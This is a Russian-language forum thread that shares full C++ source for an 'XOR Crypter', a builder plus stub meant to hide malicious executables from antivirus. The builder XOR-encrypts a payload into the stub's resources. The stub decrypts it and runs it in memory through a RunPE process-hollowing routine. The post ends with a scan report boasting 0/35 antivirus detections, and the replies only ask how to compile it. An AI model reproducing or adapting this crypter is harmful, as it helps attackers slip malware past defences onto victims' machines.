XOR Crypter

Тема в разделе "С++", создана пользователем rain.hf, 28 апр 2016.

↑ ↓
  1. rain.hf Житель форума
    rain.hf
    Ответить в чате

    Форумчанин

    Регистрация:
    08.12.2015
    Сообщения:
    134
    Симпатии:
    111
    Репа:
    +121 / 3 / -6
    билдер

    Код:
    #include <iostream>
    #include <Windows.h>
    #include <fstream>
    #include <vector>
    #include <string>
    using namespace std;
    
    char * FB;
    DWORD fs;
    char output[MAX_PATH];
    char choice;
    DWORD dwBytesWritten = 0;
    char name[MAX_PATH];
    std::vector<char> file_data;
    void RDF()
    {
        DWORD bt;
                                
        cout << "Please enter the Path of the file \nIf the file is in the same folder as the builder\nJust type the file name with an extention\nEG: Malvare.exe\n";
        cout << "File Name: ";
        cin >> name;
        cout << "Enter output name: ";
        cin >> output;
        CopyFile("stub.exe", output/*L"Crypted.exe"*/, 0);
        cout << "\nGetting the HANDLE of the file to be crypted\n";
        HANDLE efile = CreateFileA(name, GENERIC_ALL,FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    
        cout << "Getting the File size\n";
        fs = GetFileSize(efile, NULL);
    
        cout << "The File Size is: ";
        cout << fs;
        cout << " Bytes\n";
        cout << "Allocating Memory for the ReadFile function\n";
        file_data.resize(fs);
        cout << "Reading the file\n";
    
    
        ReadFile(efile, (LPVOID)(file_data.data()), fs, &bt, NULL);
    
        CloseHandle(efile);
    
        if (fs != bt)
            cout << "Error reading file!" << endl;
    }
    
    void xor_crypt(const std::string &key, std::vector<char> &data)
    {
        for (size_t i = 0; i != data.size(); i++)
            data ^= key[i % key.size()];
    
        /*ofstream out("After_enc.dat");
        for (std::vector<char>::const_iterator it = data.begin(), itEnd = data.end(); it != itEnd; ++it)
            out << *it;*/
    }
    
    void choose_enc()
    {
    
        cout << "\n\nChoose encryption method: " << endl;
        cout << "1. N/A" << endl;
        cout << "2. Simple XOR" << endl;
        cin >> choice;
    }
    
    void enc()
    {
        cout << "Encrypting the Data\n";
    
        switch (choice)
        {
        case '1':
            break;
        case '2':
            {
                /*ofstream myfile("2.dat");
                for (std::vector<char>::const_iterator it = file_data.begin(), itEnd = file_data.end(); it != itEnd; ++it)
                    myfile << *it;*/
                xor_crypt("penguin", file_data); //Encrypt it
    
            }
            break;
            return;
        }
    }
    
    void WriteToResources(LPTSTR szTargetPE, int id, LPBYTE lpBytes, DWORD dwSize)
    {
        cout << "Writing Encrypted data to stub's resources\n";
        HANDLE hResource = NULL;
        hResource = BeginUpdateResource(szTargetPE, FALSE);
        //LPVOID lpResLock = LockResource(lpBytes);
        UpdateResource(hResource, RT_RCDATA, MAKEINTRESOURCE(id), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),(LPVOID)lpBytes, dwSize);
        EndUpdateResource(hResource, FALSE);
    }
    
    int main()
    {
        std::string key = "penguin";
        RDF();
        choose_enc();
        enc();
        file_data.push_back(choice);
        cout << fs << endl;
        WriteToResources(output, 10, (BYTE *)file_data.data(), file_data.size());
        cout << "Your File Got Crypted\n";
        system("PAUSE");
    }
    
    


    Стаб

    runpe.h
    Код:
    
    #include <Windows.h>
    #include <TlHelp32.h>
    #include <wchar.h>
    typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
    typedef BOOL(WINAPI * NtSetThreadContext)(HANDLE hThread, PCONTEXT lpContext);
    typedef LPVOID(WINAPI * callVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
    typedef LPVOID(WINAPI * callVirtualAllocEx)(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
    typedef bool(WINAPI * callReadProcessMemory)(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead);
    typedef bool(WINAPI * callWriteProcessMemory)(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead);
    typedef HANDLE(WINAPI * callCreateToolhelp32Snapshot)(DWORD dwFlags, DWORD th32ProcessID);
    typedef HANDLE(WINAPI * callProcess32First)(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
    typedef HANDLE(WINAPI * callProcess32Next)(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
    
    
    
    
    void ExecFile(LPSTR szFilePath, LPVOID pFile)
    {
        PIMAGE_DOS_HEADER IDH;
        PIMAGE_NT_HEADERS INH;
        PIMAGE_SECTION_HEADER ISH;
        PROCESS_INFORMATION PI;
        STARTUPINFOA SI;
        PCONTEXT CTX;
        PDWORD dwImageBase;
        NtUnmapViewOfSection xNtUnmapViewOfSection;
        NtSetThreadContext xNtSetThreadContext;
        callReadProcessMemory xReadProcessMemory;
        callWriteProcessMemory xWriteProcessMemory;
        callVirtualAlloc xVirtualAlloc;
        callVirtualAllocEx xVirtualAllocEx;
        LPVOID pImageBase;
        int Count;
        IDH = PIMAGE_DOS_HEADER(pFile);
        if (IDH->e_magic == IMAGE_DOS_SIGNATURE)
        {
            INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew);
            if (INH->Signature == IMAGE_NT_SIGNATURE)
            {
                RtlZeroMemory(&SI, sizeof(SI));
                RtlZeroMemory(&PI, sizeof(PI));
    
                if (CreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
                {
                    xVirtualAlloc = callVirtualAlloc(GetProcAddress(GetModuleHandleA("kernel32.dll"), "VirtualAlloc"));
                    xVirtualAllocEx = callVirtualAllocEx(GetProcAddress(GetModuleHandleA("kernel32.dll"), "VirtualAllocEx"));
                    xReadProcessMemory = callReadProcessMemory(GetProcAddress(GetModuleHandleA("kernel32.dll"), "ReadProcessMemory"));
                    xWriteProcessMemory = callReadProcessMemory(GetProcAddress(GetModuleHandleA("kernel32.dll"), "WriteProcessMemory"));
                    CTX = PCONTEXT(xVirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
                    CTX->ContextFlags = CONTEXT_FULL;
                    if (GetThreadContext(PI.hThread, LPCONTEXT(CTX)))
                    {
                        xReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&dwImageBase), 4, NULL);
    
                        if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase)
                        {
                            xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
                            xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase));
                        }
    
                        pImageBase = xVirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
    
    
    
                        if (pImageBase)
                        {
                            xWriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL);
                            for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++)
                            {
                                ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40));
                                xWriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL);
                            }
                            xWriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL);
                            CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint;
    
                            xNtSetThreadContext = NtSetThreadContext(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtSetContextThread"));
                            xNtSetThreadContext(PI.hThread, LPCONTEXT(CTX));
    
                            ResumeThread(PI.hThread);
                        }
    
    
    
                    }
                }
            }
        }
        VirtualFree(pFile, 0, MEM_RELEASE);
    }
    
    main

    Код:
    #include <iostream>
    #include <Windows.h>
    #include <fstream>
    #include "Runpe.h"
    #include <vector>
    #include <string>
    using namespace std;
    
    
    int Rsize;
    
    
    std::vector<char> RData;
    
    void Resource(int id)
    {
        size_t Rsize;
    
        HRSRC hResource = FindResource(NULL, MAKEINTRESOURCE(id), RT_RCDATA);
        HGLOBAL temp = LoadResource(NULL, hResource);
        Rsize = SizeofResource(NULL, hResource);
        RData.resize(Rsize);
        memcpy((void*)RData.data(), temp, Rsize);  // replace &RData[0] with RData.data() if C++11
    }
    
    void xor_crypt(const std::string &key, std::vector<char> &data)
    {
        for (size_t i = 0; i != data.size(); i++)
            data ^= key[i % key.size()];
    }
    
    
    
    void enc()
    {
        switch (RData.back())
        {
        case '1':
            {
                std::ofstream out("1.txt");
            }
            break;
        case '2':
            {
                xor_crypt("penguin", RData);
            }
            break;
        }
        return;
    }
    
    
    
    int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
    {
    
        Resource(10);
        enc();
    
        LPVOID pFile;
        TCHAR szFilePath[1024];
    
        pFile = RData.data();
        if (pFile)
        {
            GetModuleFileNameA(0, LPSTR(szFilePath), 1024);
    
            ExecFile(LPSTR(szFilePath), pFile);
        }
        return 0;
    };
    



    Filename: Stub.exe
    Filesize: 309,50 kB
    Date: 2016-04-27 08:07:58
    MD5: 8a51b89c2da3f4acbac2ad0f68f17a02
    SHA1: 3d3165543d782c405eb768e4e34d47608b88a05c
    Status: Clean
    Rate: 0/35

    Details:
    Ad-Aware - File is clean
    A-Squared - File is clean
    Avast - File is clean
    AVG Free - File is clean
    AntiVir (Avira) - File is clean
    BitDefender - File is clean
    BullGuard - File is clean
    Clam Antivirus - File is clean
    COMODO Internet Security - File is clean
    Dr.Web - File is clean
    ESET NOD32 - File is clean
    eTrust-Vet - File is clean
    FortiClient - File is clean
    F-PROT Antivirus - File is clean
    F-Secure Internet Security - File is clean
    G Data - File is clean
    IKARUS Security - File is clean
    K7 Ultimate - File is clean
    Kaspersky Antivirus - File is clean
    McAfee - File is clean
    MS Security Essentials - File is clean
    NANO Antivirus - File is clean
    Norman - File is clean
    Norton Antivirus - File is clean
    Panda CommandLine - File is clean
    Panda Security - File is clean
    Quick Heal Antivirus - File is clean
    Solo Antivirus - File is clean
    Sophos - File is clean
    SUPERAntiSpyware - File is clean
    Trend Micro Internet Security - File is clean
    Twister Antivirus - File is clean
    VBA32 Antivirus - File is clean
    VIPRE - File is clean
    Zoner AntiVirus - File is clean

    Scan Result: https://scan.majyx.net/scans/result/a138fa1dbfe5b6431e2f17d61b38cdd17b429ee8
    Scan by MaJyx Scanner
     
    Последнее редактирование: 28 апр 2016
    • Мне нравится Мне нравится x 2
  2. MIXA066 Уважаемый пользователь
    MIXA066
    Ответить в чате

    Форумчанин

    Регистрация:
    18.05.2014
    Сообщения:
    380
    Симпатии:
    165
    Пол:
    Мужской
    Репа:
    +176 / 1 / -0
    Никогда не имел дела с VS как там компилировать/какой тип проекта выбирать?
     
  3. rain.hf Житель форума
    rain.hf
    Ответить в чате

    Форумчанин

    Регистрация:
    08.12.2015
    Сообщения:
    134
    Симпатии:
    111
    Репа:
    +121 / 3 / -6
    можешь не в VS собрать Dmeh-Smeh-Smeh!!! а так пустой
     
Похожие темы:
  1. ewwa
    Ответов:
    2
    Просмотров:
    1.617
  2. ewwa
    Ответов:
    0
    Просмотров:
    1.485
  3. ewwa
    Ответов:
    0
    Просмотров:
    1.313
  4. ewwa
    Ответов:
    0
    Просмотров:
    1.358
  5. rain.hf
    Ответов:
    5
    Просмотров:
    1.148
Загрузка...

Поделиться этой страницей